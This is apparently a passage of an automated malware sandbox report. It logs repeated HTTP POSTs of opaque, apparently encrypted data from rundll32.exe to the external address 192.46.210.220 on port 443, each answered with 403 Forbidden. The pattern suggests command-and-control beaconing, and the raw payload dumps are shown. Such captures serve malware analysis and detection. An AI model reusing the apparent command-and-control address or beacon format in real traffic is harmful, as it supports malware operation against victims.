                                                                                                        2021-10-28 02:59:21 UTC199OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:21 UTC204INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.649927192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:22 UTC204OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:22 UTC204OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:22 UTC209INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.649936192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:25 UTC209OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:25 UTC209OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:25 UTC214INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:25 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.649941192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:26 UTC214OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:26 UTC214OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:26 UTC219INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.649961192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:29 UTC219OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:29 UTC219OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:29 UTC224INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:29 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.649967192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:30 UTC224OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:30 UTC224OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:30 UTC229INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.649982192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:34 UTC229OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:34 UTC229OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:35 UTC239INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:35 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.649985192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:35 UTC234OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:35 UTC234OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:35 UTC239INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:35 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.649998192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:38 UTC239OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:38 UTC239OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:39 UTC249INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:39 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.649999192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:38 UTC244OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:38 UTC244OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:39 UTC249INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:39 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.649773192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:11 UTC24OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:11 UTC25OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:11 UTC29INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:11 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.650008192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:42 UTC249OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:42 UTC249OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:43 UTC259INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:43 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.650009192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:42 UTC254OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:59:42 UTC254OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:59:43 UTC259INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:59:43 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.650016192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:59:46 UTC259OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
